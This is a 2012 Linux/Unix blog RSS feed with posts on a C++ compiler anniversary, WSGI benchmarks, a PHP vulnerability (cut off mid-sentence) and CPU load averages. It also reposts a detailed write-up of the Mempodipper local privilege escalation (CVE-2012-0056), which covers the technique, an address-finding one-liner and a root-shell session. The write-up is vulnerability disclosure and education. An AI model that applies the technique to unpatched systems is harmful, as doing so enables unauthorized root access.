<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Unix Linux Windows</title>
	<atom:link href="http://www.enunix.com/feed" rel="self" type="application/rss+xml" />
	<link>http://www.enunix.com</link>
	<description>Just another WordPress site</description>
	<lastBuildDate>Thu, 09 Feb 2012 02:15:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>The Microsoft C++ Compiler Turns 20!</title>
		<link>http://www.enunix.com/1119.html</link>
		<comments>http://www.enunix.com/1119.html#comments</comments>
		<pubDate>Thu, 09 Feb 2012 02:15:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1119</guid>
		<description><![CDATA[This month, we enter the third decade of C++ at Microsoft. It was twenty years ago, in February of 1992, that we released our first C++ compiler: Microsoft C/C++ 7.0. Before then, we already worked with several of the C++ &#8230; <a href="http://www.enunix.com/1119.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>This month, we enter the third decade of C++ at Microsoft.</p>
<p>It was twenty years ago, in February of 1992, that we released our first C++ compiler: Microsoft C/C++ 7.0. Before then, we already worked with several of the C++ “preprocessor” compilers that took C++ and converted it to C before our compiler then created the executable program. But starting in 1992, Microsoft’s premier native compiler supported C++ directly, and has done so ever since.</p>
<p>C/C++ 7.0 shipped in a box that was over two feet long and produced MS-DOS, Windows and OS/2 applications. It also sported the last of the character oriented development environments for C that we ever shipped – the following product was Visual C++, which built on what we had learned from delivering QuickC. Since those early days, we have shipped eleven major releases of C/C++ products (ignoring small point upgrades) for both Windows and embedded development.</p>
<p>This month, on the 20th anniversary of our first C++ compiler, we’re looking forward to shipping the beta of Visual C++ 11. It includes support for ARM processors, Windows 8 tablet apps, C++ AMP for heterogeneous parallel computing, automatic parallelization, and the complete ISO C++11 standard library… and a few more of the new C++11 language features too.</p>
<p>Last summer, we pledged to publish the C++ AMP specification as an open specification that any compiler vendor may implement, to target any operating system platform. Today, we published the C++ AMP open specification to support using C++ for heterogeneous parallel computing on GPUs and multicore/SSE today, with more to come in the future. Read the full announcement and download the specification at the Native Concurrency blog.</p>
<p>Finally, to make this anniversary celebration complete, we’re shifting gears to pick up speed: After Visual C++ 11 ships, you’ll see us deliver compiler and library features more frequently in shorter out-of-band release cycles than our historical 2- or 3-year timeframe. And, of course, the first and most important target of those more agile releases is to deliver more and more of the incredible value in the new ISO Standard C++11 language. Please check Herb Sutter&#8217;s keynote at GoingNative 2012 for further details.</p>
<p>After 20 years, C++ is alive and well, and going stronger and faster than ever, not just at Microsoft but across our industry. Use it. Love it. And go native!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1119.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>fcgi vs. gunicorn vs. uWSGI</title>
		<link>http://www.enunix.com/1127.html</link>
		<comments>http://www.enunix.com/1127.html#comments</comments>
		<pubDate>Mon, 06 Feb 2012 02:56:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[fcgi]]></category>
		<category><![CDATA[uwsgi]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1127</guid>
		<description><![CDATA[uwsgi is the latest and greatest WSGI server and promising to be the fastest possible way to run Nginx + Django. Proof here But! Is it that simple? Especially if you&#8217;re involving Django herself. So I set out to benchmark &#8230; <a href="http://www.enunix.com/1127.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://projects.unbit.it/uwsgi/">uwsgi</a> is the latest and greatest WSGI server and promising to be the fastest possible way to run Nginx + Django. <a href="http://nichol.as/benchmark-of-python-web-servers">Proof here</a> But! Is it that simple? Especially if you&#8217;re involving Django herself.</p>
<p>So I set out to benchmark good old threaded <a href="http://djangoadvent.com/1.2/deploying-django-site-using-fastcgi/">fcgi</a> and <a href="http://gunicorn.org/">gunicorn</a> and then with a source compiled <span class='bm_keywordlink'><a href="http://www.enunix.com/category/php">nginx</a></span> with the uwsgi module baked in I also benchmarked uwsgi. The first mistake I did was testing a Django view that was using sessions and other crap. I profiled the view to make sure it wouldn&#8217;t be the bottleneck as it appeared to take only 0.02 seconds each. However, with fcgi, gunicorn and uwsgi I kept being stuck on about 50 requests per second. Why? 1/0.02 = 50.0!!! Clearly the slowness of the Django view was thee bottleneck (for the curious, what took all of 0.02 was the need to create new session keys and putting them into the database).</p>
<p>So I wrote a really dumb Django view with no sessions middleware enabled. Now we&#8217;re getting some interesting numbers:</p>
<pre> fcgi (threaded)              640 r/s
 fcgi (prefork 4 processors)  240 r/s (*)
 gunicorn (2 workers)         1100 r/s
 gunicorn (5 workers)         1300 r/s
 gunicorn (10 workers)        1200 r/s (?!?)
 uwsgi (2 workers)            1800 r/s
 uwsgi (5 workers)            2100 r/s
 uwsgi (10 workers)           2300 r/s

 (* this made my computer exceptionally sluggish as CPU when through the roof)</pre>
<p><a href="http://www.enunix.com/1127.html/shootout" rel="attachment wp-att-1128"><img class="alignnone size-full wp-image-1128" title="shootout" src="http://www.enunix.com/wp-content/uploads/2012/02/shootout.png" alt="" width="655" height="582" /></a></p>
<p>If you&#8217;re wondering why the numbers appear to be rounded it&#8217;s because I ran the benchmark multiple times and guesstimated an average (also obviously excluded the first run).</p>
<p><strong>Misc notes</strong></p>
<ul>
<li>For gunicorn it didn&#8217;t change the numbers if I used a TCP (e.g. 127.0.0.1:9000) or a UNIX socket (e.g. /tmp/wsgi.sock)</li>
<li>On the upstream directive in <span class='bm_keywordlink'><a href="http://www.enunix.com/category/php">nginx</a></span> it didn&#8217;t impact the benchmark to set <code>fail_timeout=0</code> or not.</li>
<li>fcgi on my laptop was unable to fork new processors automatically in this test so it stayed as 1 single process! Why?!!</li>
<li>when you get more than 2,000 requests/second the benchmark itself and the computer you run it on becomes wobbly. I managed to get 3,400 requests/second out of uwsgi but then the benchmark started failing requests.</li>
<li>These tests were done on an old 32bit dual core Thinkpad with 2Gb RAM <img src='http://www.enunix.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </li>
<li>uwsgi was a bitch to configure. Most importantly, who the hell compiles source code these days when packages are so much much more convenient? (<a href="http://www.fry-it.com/">Fry-IT</a> hosts around 100 web servers that need patching and love)</li>
<li>Why would anybody want to use sockets when they can cause permission problems? TCP is so much more straight forward.</li>
<li><a href="http://gunicorn.org/tuning.html">changing the number of ulimits to 2048</a> did not improve my results on this computer</li>
<li>gunicorn is not available as a Debian package <img src='http://www.enunix.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </li>
<li>Adding too many workers can actually damage your performance. See example of 10 workers on gunicorn.</li>
<li>I did not bother with mod_wsgi since I don&#8217;t want to go near Apache and to be honest last time I tried I got really mysterious errors from mod_wsgi that I ran away screaming.</li>
</ul>
<p><strong>Conclusion</strong></p>
<p><strong>gunicorn is the winner in my eyes.</strong> It&#8217;s easy to configure and get up and running and certainly fast enough and I don&#8217;t have to worry about stray threads being created willy nilly like threaded fcgi. uwsgi definitely worth coming back to the day I need to squeeze few more requests per second but right now it just feels to inconvenient as I can&#8217;t convince my sys admins to maintain compiled versions of <span class='bm_keywordlink'><a href="http://www.enunix.com/category/php">nginx</a></span> for the little extra benefit.</p>
<p>Having said that, the day uwsgi becomes available as a Debian package I&#8217;m all over it like a dog on an ass-flavored cookie.</p>
<p>And the &#8220;killer benefit&#8221; with gunicorn is that I can predict the memory usage. I found, on my laptop: 1 worker = 23Mb, 5 workers = 82Mb, 10 workers = 155Mb and these numbers stayed like that very predictably which means I can decide quite accurately how much RAM I should let Django (ab)use.</p>
<p><strong>UPDATE:</strong></p>
<p>Since this was publish we, in my company, have changed all Djangos to run over uWSGI. It&#8217;s proven faster than any alternatives and extremely stable. We actually started using it before it was merged into core Nginx but considering how important this is and how many sites we have it&#8217;s not been a problem to run our own Nginx package.</p>
<p>Hail uWSGI!</p>
<p>Voila! Now feel free to flame away about the inaccuracies and what multitude of more wheels and knobs I could/should twist to get even more juice out.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1127.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Critical PHP Remote Vulnerability Introduced in Fix for PHP Hashtable Collision DOS</title>
		<link>http://www.enunix.com/1123.html</link>
		<comments>http://www.enunix.com/1123.html#comments</comments>
		<pubDate>Fri, 03 Feb 2012 09:08:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bug]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[max_input_vars]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1123</guid>
		<description><![CDATA[Today, Stefan Esser (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (updateassigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December. The Vulnerable Fix The fix to &#8230; <a href="http://www.enunix.com/1123.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Today, <a href="http://www.suspekt.org/" target="_blank">Stefan Esser</a> (@i0n1c) reported a critical remotely exploitable vulnerability in PHP 5.3.9 (<strong>update</strong>assigned CVE-2012-0830). The funny thing is that this vulnerability was introduced in the fix for the hash collision DOS (CVE-2011-4885) reported in December.</p>
<h5>The Vulnerable Fix</h5>
<p>The fix to prevent hash collisions introduces a new configuration property in <span class='bm_keywordlink'><a href="http://www.enunix.com/category/php">php</a></span>.ini called</p>
<pre>max_input_vars</pre>
<p>This configuration element limits the number of variables that can be used in a request (e.g. http://request.com/foo.<span class='bm_keywordlink'><a href="http://www.enunix.com/category/php">php</a></span>?a=1&amp;b=2&amp;c=3). The default is set to 1000.</p>
<p>The changes were made to <a href="http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/php_variables.c?revision=321634&amp;view=markup" target="_link">php_variables.c</a> in the function php_register_variable_ex.</p>
<p>PHP starts off by “regis</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1123.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Understanding Linux CPU Load &#8211; when should you be worried?</title>
		<link>http://www.enunix.com/1120.html</link>
		<comments>http://www.enunix.com/1120.html#comments</comments>
		<pubDate>Fri, 03 Feb 2012 02:15:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[CPU]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Load]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1120</guid>
		<description><![CDATA[You might be familiar with Linux load averages already. Load averages are the three numbers shown with the uptime and top commands &#8211; they look like this: load average: 0.09, 0.05, 0.01 Most people have an inkling of what the load averages mean: the &#8230; <a href="http://www.enunix.com/1120.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>You might be familiar with Linux load averages already. Load averages are the three numbers shown with the <code>uptime</code> and <code>top</code> commands &#8211; they look like this:</p>
<div>load average: 0.09, 0.05, 0.01</div>
<p>Most people have an inkling of what the load averages mean: the three numbers represent averages over progressively longer periods of time (one, five, and fifteen minute averages), and that lower numbers are better. Higher numbers represent a problem or an overloaded machine. But, what&#8217;s the the threshold? What constitutes &#8220;good&#8221; and &#8220;bad&#8221; load average values? When should you be concerned over a load average value, and when should you scramble to fix it ASAP?</p>
<p>First, a little background on what the load average values mean. We&#8217;ll start out with the simplest case: a machine with one single-core processor.</p>
<h2>The traffic analogy</h2>
<p>A single-core CPU is like a single lane of traffic. Imagine you are a bridge operator &#8230; sometimes your bridge is so busy there are cars lined up to cross. You want to let folks know how traffic is moving on your bridge. A decent metric would be <em>how many cars are waiting</em> at a particular time. If no cars are waiting, incoming drivers know they can drive across right away. If cars are backed up, drivers know they&#8217;re in for delays.</p>
<p>So, Bridge Operator, what numbering system are you going to use? How about:</p>
<ul>
<li><strong>0.00 means there&#8217;s no traffic on the bridge at all</strong>. In fact, between 0.00 and 1.00 means there&#8217;s no backup, and an arriving car will just go right on.</li>
<li><strong>1.00 means the bridge is <em>exactly</em> at capacity.</strong> All is still good, but if traffic gets a little heavier, things are going to slow down.</li>
<li><strong>over 1.00 means there&#8217;s backup.</strong> How much? Well, 2.00 means that there are two lanes worth of cars total &#8212; one lane&#8217;s worth on the bridge, and one lane&#8217;s worth waiting. 3.00 means there are three lane&#8217;s worth total &#8212; one lane&#8217;s worth on the bridge, and two lanes&#8217; worth waiting. Etc.</li>
</ul>
<p><img src="http://img.skitch.com/20090728-jek9ssauydsi19nbcja26tw8ju.png" alt="" /> = load of 1.00</p>
<p><img src="http://img.skitch.com/20090728-c3278n4dj5t766u5mcjhwb2h57.png" alt="" /> = load of 0.50</p>
<p><img src="http://img.skitch.com/20090728-89jd6aydgwd9j26in49h7y1n7g.png" alt="" /> = load of 1.70</p>
<p>This is basically what CPU load is. &#8220;Cars&#8221; are processes using a slice of CPU time (&#8220;crossing the bridge&#8221;) or queued up to use the CPU. Unix refers to this as the <em>run-queue length</em>: the sum of the number of processes that are currently running plus the number that are waiting (queued) to run.</p>
<p>Like the bridge operator, you&#8217;d like your cars/processes to never be waiting. So, your CPU load should ideally stay below 1.00. Also like the bridge operator, you are still ok if you get some temporary spikes above 1.00 &#8230; but when you&#8217;re consistently above 1.00, you need to worry.</p>
<h2>So you&#8217;re saying the ideal load is 1.00?</h2>
<p>Well, not exactly. The problem with a load of 1.00 is that you have no headroom. In practice, many sysadmins will draw a line at 0.70:</p>
<ul>
<li>The <strong>&#8220;Need to Look into it&#8221;</strong> Rule of Thumb: <strong>0.70</strong> If your load average is staying above &gt; 0.70, it&#8217;s time to investigate before things get worse.</li>
<li>The <strong>&#8220;Fix this now&#8221;</strong> Rule of Thumb: <strong>1.00</strong>. If your load average stays above 1.00, find the problem and fix it now. Otherwise, you&#8217;re going to get woken up in the middle of the night, and it&#8217;s not going to be fun.</li>
<li>The <strong>&#8220;Arrgh, it&#8217;s 3AM WTF?&#8221;</strong> Rule of Thumb: <strong>5.0</strong>. If your load average is above 5.00, you could be in serious trouble, your box is either hanging or slowing way down, and this will (inexplicably) happen in the worst possible time like in the middle of the night or when you&#8217;re presenting at a conference. Don&#8217;t let it get there.</li>
</ul>
<h2>What about Multi-processors? My load says 3.00, but things are running fine!</h2>
<p>Got a quad-processor system? It&#8217;s still healthy with a load of 3.00.</p>
<p>On multi-processor system, the load is relative to the number of processor cores available. The &#8220;100% utilization&#8221; mark is 1.00 on a single-core system, 2.00, on a dual-core, 4.00 on a quad-core, etc.</p>
<p>If we go back to the bridge analogy, the &#8220;1.00&#8243; really means &#8220;one lane&#8217;s worth of traffic&#8221;. On a one-lane bridge, that means it&#8217;s filled up. On a two-late bridge, a load of 1.00 means its at 50% capacity &#8212; only one lane is full, so there&#8217;s another whole lane that can be filled.</p>
<p><img src="http://img.skitch.com/20090728-8n99xu7xq1hkixcahtn6pgciin.pn" alt="" /> = load of 2.00 on two-lane road</p>
<p>Same with CPUs: a load of 1.00 is 100% CPU utilization on single-core box. On a dual-core box, a load of 2.00 is 100% CPU utilization.</p>
<h2>Multicore vs. multiprocessor</h2>
<p>While we&#8217;re on the topic, let&#8217;s talk about multicore vs. multiprocessor. For performance purposes, is a machine with a single dual-core processor basically equivalent to a machine with two processors with one core each? Yes. Roughly. There are lots of subtleties here concerning amount of cache, frequency of process hand-offs between processors, etc. Despite those finer points, for the purposes of sizing up the CPU load value, the <em>total number of cores</em> is what matters, regardless of how many physical processors those cores are spread across.</p>
<p>Which leads us to a two new Rules of Thumb:</p>
<ul>
<li><em>The &#8220;number of cores = max load&#8221;</em> Rule of Thumb: on a multicore system, your load should not exceed the number of cores available.</li>
<li>The <em>&#8220;cores is cores&#8221;</em> Rule of Thumb: How the cores are spread out over CPUs doesn&#8217;t matter. Two quad-cores == four dual-cores == eight single-cores. It&#8217;s all eight cores for these purposes.</li>
</ul>
<h2>Bringing It Home</h2>
<p>Let&#8217;s take a look at the load averages output from <code>uptime</code>:</p>
<div>~ $ uptime<br />
23:05 up 14 days, 6:08, 7 users, load averages: 0.65 0.42 0.36</div>
<p>This is on a dual-core CPU, so we&#8217;ve got lots of headroom. I won&#8217;t even think about it until load gets and stays above 1.7 or so.</p>
<p>Now, what about those three numbers? 0.65 is the average over the last minute, 0.42 is the average over the last five minutes, and 0.36 is the average over the last 15 minutes. Which brings us to the question:</p>
<p><strong>Which average should I be observing? One, five, or 15 minute?</strong></p>
<p>For the numbers we&#8217;ve talked about (1.00 = fix it now, etc), you should be looking at the five or 15-minute averages. Frankly, if your box spikes above 1.0 on the one-minute average, you&#8217;re still fine. It&#8217;s when the 15-minute average goes north of 1.0 and stays there that you need to snap to. (obviously, as we&#8217;ve learned, adjust these numbers to the number of processor cores your system has).</p>
<p><strong>So # of cores is important to interpreting load averages &#8230; how do I know how many cores my system has?</strong></p>
<p><code>cat /proc/cpuinfo</code> to get info on each processor in your system. <em>Note: not available on OSX, Google for alternatives</em>. To get just a count, run it through <code>grep</code>and word count: <code>grep 'model name' /proc/cpuinfo | wc -l</code></p>
<h2>Monitoring Linux CPU Load with Scout</h2>
<p><a href="http://scoutapp.com/">Scout</a> provides 2 ways to modify the CPU load. Our <a href="http://scoutapp.com/plugin_urls/4-server-load">original server load plugin</a> and<a href="http://scoutapp.com/plugin_urls/151-load-per-processor">Jesse Newland&#8217;s Load-Per-Processor plugin</a> both report the CPU load and alert you when the load peaks and/or is trending in the wrong direction:</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1120.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Local Privilege Escalation via SUID /proc/pid/mem Write</title>
		<link>http://www.enunix.com/1116.html</link>
		<comments>http://www.enunix.com/1116.html#comments</comments>
		<pubDate>Mon, 30 Jan 2012 08:26:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Kernel]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Privilege]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1116</guid>
		<description><![CDATA[Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were &#8230; <a href="http://www.enunix.com/1116.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Introducing <a href="http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c">Mempodipper</a>, an exploit for CVE-2012-0056. <tt>/proc/<em>pid</em>/mem</tt> is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to <tt>/proc/<em>pid</em>/mem</tt> were deemed sufficient, and so the prior <tt>#ifdef</tt> that prevented write support for writing to arbitrary process memory <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=198214a7">was removed</a>. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. <em>This means that all Linux kernels &gt;=2.6.39 are vulnerable</em>, up until the <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc">fix commit for it</a> a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.</p>
<p>When <tt>/proc/<em>pid</em>/mem</tt> is opened, this kernel code is called:</p>
<div>
<div>
<pre>static int mem_open(struct inode* inode, struct file* file)
{
	file-&gt;private_data = (void*)((long)current-&gt;self_exec_id);
	/* OK to pass negative loff_t, we can catch out-of-range */
	file-&gt;f_mode |= FMODE_UNSIGNED_OFFSET;
	return 0;
}</pre>
</div>
</div>
<p>There are no restrictions on opening; anyone can open the <tt>/proc/<em>pid</em>/mem</tt> <a href="http://en.wikipedia.org/wiki/File_descriptor">fd</a> for any process (subject to the ordinary VFS restrictions). It simply makes note of the original process’s <tt>self_exec_id</tt> that it was opened with and stores this away for checking later during reads and writes.</p>
<p>Writes (and reads), however, have permissions checking restrictions. Let’s take a look at the write function:</p>
<div>
<div>
<pre>static ssize_t mem_write(struct file * file, const char __user *buf,
			 size_t count, loff_t *ppos)
{

/* unimportant code removed for blog post */	

	struct task_struct *task = get_proc_task(file-&gt;f_path.dentry-&gt;d_inode);

/* unimportant code removed for blog post */

	mm = check_mem_permission(task);
	copied = PTR_ERR(mm);
	if (IS_ERR(mm))
		goto out_free;

/* unimportant code removed for blog post */	

	if (file-&gt;private_data != (void *)((long)current-&gt;self_exec_id))
		goto out_mm;

/* unimportant code removed for blog post
 * (the function here goes onto write the buffer into the memory)
 */</pre>
</div>
</div>
<p>So there are two relevant checks in place to prevent against unauthorized writes: <tt>check_mem_permission</tt> and <tt>self_exec_id</tt>. Let’s do the first one first and second one second.</p>
<p>The code of <tt>check_mem_permission</tt> simply calls into <tt>__check_mem_permission</tt>, so here’s the code of that:</p>
<div>
<div>
<pre>static struct mm_struct *__check_mem_permission(struct task_struct *task)
{
	struct mm_struct *mm;

	mm = get_task_mm(task);
	if (!mm)
		return ERR_PTR(-EINVAL);

	/*
	 * A task can always look at itself, in case it chooses
	 * to use system calls instead of load instructions.
	 */
	if (task == current)
		return mm;

	/*
	 * If current is actively ptrace'ing, and would also be
	 * permitted to freshly attach with ptrace now, permit it.
	 */
	if (task_is_stopped_or_traced(task)) {
		int match;
		rcu_read_lock();
		match = (ptrace_parent(task) == current);
		rcu_read_unlock();
		if (match &amp;&amp; ptrace_may_access(task, PTRACE_MODE_ATTACH))
			return mm;
	}

	/*
	 * No one else is allowed.
	 */
	mmput(mm);
	return ERR_PTR(-EPERM);
}</pre>
</div>
</div>
<p>There are two ways that the memory write is authorized. Either <tt>task == current</tt>, meaning that the process being written to is the process writing, or <tt>current</tt> (the process writing) has esoteric ptrace-level permissions to play with <tt>task</tt> (the process being written to). Maybe you think you can trick the ptrace code? It’s tempting. But I don’t know. Let’s instead figure out how we can make a process write arbitrary memory to itself, so that <tt>task == current</tt>.</p>
<p>Now naturally, we want to write into the memory of <a href="http://en.wikipedia.org/wiki/Setuid">suid processes</a>, since then we can get root. Take a look at this:</p>
<div>
<div>
<pre>$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy</pre>
</div>
</div>
<p><tt>su</tt> will spit out whatever text you want onto stderr, prefixed by “Unknown id:”. So, we can open a fd to <tt>/proc/self/mem</tt>, <tt>lseek</tt> to the right place in memory for writing (more on that later), use <a href="http://en.wikipedia.org/wiki/Redirection_(computing)"><tt>dup2</tt></a> to couple together stderr and the mem fd, and then <a href="http://en.wikipedia.org/wiki/Exec_(operating_system)"><tt>exec</tt></a> to <tt>su $shellcode</tt> to write an <span class='bm_keywordlink'><a href="http://www.enunix.com/category/shell">shell</a></span> spawner to the process memory, and then we have root. Really? Not so easy.</p>
<p>Here the other restriction comes into play. After it passes the <tt>task == current</tt> test, it then checks to see if the current <tt>self_exec_id</tt> matches the <tt>self_exec_id</tt> that the fd was opened with. What on earth is <tt>self_exec_id</tt>? It’s <a href="http://lxr.linux.no/linux+v3.2.1/+search?search=self_exec_id">only referenced a few places</a> in the kernel. The most important one happens to be inside of <tt>exec</tt>:</p>
<div>
<div>
<pre>void setup_new_exec(struct linux_binprm * bprm)
{
/* massive amounts of code trimmed for the purpose of this blog post */

	/* An exec changes our domain. We are no longer part of the thread
	   group */

	current-&gt;self_exec_id++;

	flush_signal_handlers(current, 0);
	flush_old_files(current-&gt;files);
}
EXPORT_SYMBOL(setup_new_exec);</pre>
</div>
</div>
<p><tt>self_exec_id</tt> is incremented each time a process <tt>exec</tt>s. So in this case, it functions so that you can’t open the fd in a non-suid process, <tt>dup2</tt>, and then <tt>exec</tt> to a suid process… which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?</p>
<p>Here’s how to get around it. We fork a child, and inside of that child, we <tt>exec</tt> to <em>a new process</em>. The initial child fork has a <tt>self_exec_id</tt> equal to its parent. When we <tt>exec</tt> to a new process, <tt>self_exec_id</tt> increments by one. Meanwhile, the parent itself is busy <tt>exec</tt>ing to our shellcode writing <tt>su</tt> process, so its <tt>self_exec_id</tt> gets incremented to the same value. So what we do is — we make this child fork and <tt>exec</tt> to a new process, and inside of that new process, we <em>open up a fd to <tt>/proc/parent-pid/mem</tt> using the pid of the parent process, not our own process</em> (as was the case prior). We can open the fd like this because there is no permissions checking for a mere open. When it is opened, its <tt>self_exec_id</tt> has already incremented to the right value that the parent’s <tt>self_exec_id</tt> will be when we <tt>exec</tt> to <tt>su</tt>. So finally, we pass our opened fd from the child process back to the parent process (using some <a href="http://archives.neohapsis.com/archives/postfix/2000-09/1476.html">very black unix domain sockets magic</a>), do our <tt>dup2</tt>ing, and <tt>exec</tt> into <tt>su</tt> with the <span class='bm_keywordlink'><a href="http://www.enunix.com/category/shell">shell</a></span> code.</p>
<p>There is one remaining objection. Where do we write to? We have to <tt>lseek</tt> to the proper memory location before writing, and <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR</a> randomizes processes address spaces making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:</p>
<div>
<div>
<pre>$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)</pre>
</div>
</div>
<p>This means that <tt>su</tt> does not have a relocatable .text section (otherwise it would spit out “DYN” instead of “EXEC”). It turns out that <tt>su</tt> on the vast majority of distros is <em>not compiled with <a href="http://en.wikipedia.org/wiki/Position-independent_code">PIE</a></em>, disabling ASLR for the .text section of the binary! So we’ve chosen <tt>su</tt> wisely. The offsets in memory will always be the same. So to find the right place to write to, let’s check out the assembly surrounding the printing of the “Unknown id: blabla” error message.</p>
<p>It gets the error string here:</p>
<div>
<div>
<pre>  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 (dcgettext@plt)</pre>
</div>
</div>
<p>And then writes it to stderr:</p>
<div>
<div>
<pre>  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 (stderr)
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 (__fprintf_chk@plt)</pre>
</div>
</div>
<p>Closes the log:</p>
<div>
<div>
<pre>  4036a3:       e8 f0 eb ff ff          callq  402298 (closelog@plt)</pre>
</div>
</div>
<p>And then exits the program:</p>
<div>
<div>
<pre>  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 (exit@plt)</pre>
</div>
</div>
<p>We therefore want to use 0×402178, which is the exit function it calls. We can, in an exploit, automate the finding of the <tt>exit@plt</tt> symbol with a simple <span class='bm_keywordlink'><a href="http://www.enunix.com/category/shell">bash</a></span> one-liner:</p>
<div>
<div>
<pre>$ objdump -d /bin/su|grep '&lt;exit@plt&gt;'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'
0x402178</pre>
</div>
</div>
<p>So naturally, we want to write to 0×402178 minus the number of letters in the string “Unknown id: “, so that our shellcode is placed at exactly the right place.</p>
<p>The shellcode should be simple and standard. It sets the uid and gid to 0 and <tt>exec</tt>s into a <span class='bm_keywordlink'><a href="http://www.enunix.com/category/shell">shell</a></span>. If we want to be clever, we can reopen stderr by, prior to <tt>dup2</tt>ing the memory fd to stderr, we choose another fd to dup stderr to, and then in the shellcode, we <tt>dup2</tt> that other fd <em>back</em> to stderr.</p>
<p>In the end, the exploit works like a charm with total reliability:</p>
<div>
<div>
<pre> 
CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#</pre>
</div>
</div>
<p>You can watch a <a href="http://youtu.be/yLu4q4gMCCA">video</a> of it in action:</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1116.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
